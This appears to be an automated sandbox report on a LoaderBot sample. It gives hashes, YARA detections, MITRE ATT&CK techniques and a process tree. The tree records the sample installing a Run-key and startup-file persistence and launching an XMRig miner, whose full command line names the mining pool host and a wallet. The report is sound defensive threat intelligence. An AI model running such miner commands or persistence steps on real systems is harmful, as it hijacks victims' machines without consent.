loaderbot | ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f

Analysis

max time kernel
52s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
08/07/2024, 17:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe
Size

4.8MB
MD5

713ed47553b56e8ef7e5dd2833395594
SHA1

a8ea35bb4a054d7686157f8d5e117881ad4bf124
SHA256

ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f
SHA512

78456d3741fe92fc1ed7f3310e7582fe727ca0977af0598502177d4ddafa3f035f551d9164982791c45af61d6115d36c6f91f3fd2dbe679a80120009abfdc06a
SSDEEP

98304:6qwmqwyPesWCyNiycBRHSh5lFhpt8AZlkje6Qd9mb/IPXj4WiT:6qwmqwyPJZyNiycB4N2jVi9m7EiT

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023494-14.dat	loaderbot
behavioral1/memory/428-22-0x0000000000640000-0x0000000000A3E000-memory.dmp	loaderbot

XMRig Miner payload 15 IoCs

miner

resource	yara_rule
behavioral1/memory/4392-38-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1056-41-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/4424-44-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/4424-45-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/4424-47-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/4720-50-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/4720-51-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/4720-52-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1232-55-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1232-56-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1232-57-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/4724-60-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/4724-61-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/4724-62-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/4724-63-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation	ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation	clamer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation	poldawr.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	poldawr.exe

Executes dropped EXE 6 IoCs

pid	Process
4844	clamer.exe
428	poldawr.exe
4392	Driver.exe
1056	Driver.exe
4424	Driver.exe
4720	Driver.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\poldawr.exe"	poldawr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe
428	poldawr.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	428	poldawr.exe
Token: SeLockMemoryPrivilege	4392	Driver.exe
Token: SeLockMemoryPrivilege	4392	Driver.exe
Token: SeLockMemoryPrivilege	4424	Driver.exe
Token: SeLockMemoryPrivilege	4424	Driver.exe
Token: SeLockMemoryPrivilege	4720	Driver.exe
Token: SeLockMemoryPrivilege	4720	Driver.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2296 wrote to memory of 1632	2296	ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe	82
PID 2296 wrote to memory of 1632	2296	ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe	82
PID 1632 wrote to memory of 4844	1632	cmd.exe	85
PID 1632 wrote to memory of 4844	1632	cmd.exe	85
PID 4844 wrote to memory of 428	4844	clamer.exe	88
PID 4844 wrote to memory of 428	4844	clamer.exe	88
PID 4844 wrote to memory of 428	4844	clamer.exe	88
PID 428 wrote to memory of 4392	428	poldawr.exe	91
PID 428 wrote to memory of 4392	428	poldawr.exe	91
PID 428 wrote to memory of 1056	428	poldawr.exe	96
PID 428 wrote to memory of 1056	428	poldawr.exe	96
PID 428 wrote to memory of 4424	428	poldawr.exe	98
PID 428 wrote to memory of 4424	428	poldawr.exe	98
PID 428 wrote to memory of 4720	428	poldawr.exe	103
PID 428 wrote to memory of 4720	428	poldawr.exe	103

C:\Users\Admin\AppData\Local\Temp\ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe
"C:\Users\Admin\AppData\Local\Temp\ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe
    clamer.exe -priverdD
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4844
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\poldawr.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\poldawr.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:428
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4392
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1056
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4424
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4720
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:1232
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat

Filesize
37B

MD5
28151380c82f5de81c1323171201e013

SHA1
ae515d813ba2b17c8c5ebdae196663dc81c26d3c

SHA256
bb8582ce28db923f243c8d7a3f2eccb0ed25930f5b5c94133af8eefb57a8231d

SHA512
46b29cba0dc813de0c58d2d83dc298fa677921fd1f19f41e2ed3c7909c497fab2236d10a9ae59b3f38e49cf167964ede45e15543673a1e0843266242b8e26253

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe

Filesize
4.4MB

MD5
638dec887f2509a5cf5b14b54f537090

SHA1
1dcffcea58044f5f899ada8a50c9d702d96762fb

SHA256
d39995aa446861b523a59675c685ef3c144cdf872b734325b77118bedaf1b8c3

SHA512
76757e27c28b518b04dc90168e1bcf2c65d876a8f0747679d94c152200b7d7d35852bc38681a2d84f0100d394bf1e087aed243a9359b0ce08d719ed44b4fb555

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\poldawr.exe

Filesize
4.0MB

MD5
9eeeab9a8e8a28fb1f293a89f16f7c47

SHA1
47bb11577a5e26c5361981c13a3f14d3a8a9d29d

SHA256
5d3f2718aa12bf295540debe06aba1634bd1a22a6dbec4acec16dad34508c9cf

SHA512
338fe11bfca57e59a0718a160b9233cbedcdd6cf670fa82b3ed9bd11c593acb0bc11184f4884470302ac715c3ef98d63528a46e11765febcd2a84515f4594d91

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
memory/428-22-0x0000000000640000-0x0000000000A3E000-memory.dmp

Filesize
4.0MB

Download
memory/428-25-0x00000000056C0000-0x0000000005726000-memory.dmp

Filesize
408KB

Download
memory/1056-41-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1232-55-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1232-57-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1232-56-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4392-37-0x0000000001FC0000-0x0000000001FD4000-memory.dmp

Filesize
80KB

Download
memory/4392-38-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4392-35-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4424-44-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4424-47-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4424-45-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4720-51-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4720-52-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4720-50-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4724-60-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4724-61-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4724-62-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4724-63-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download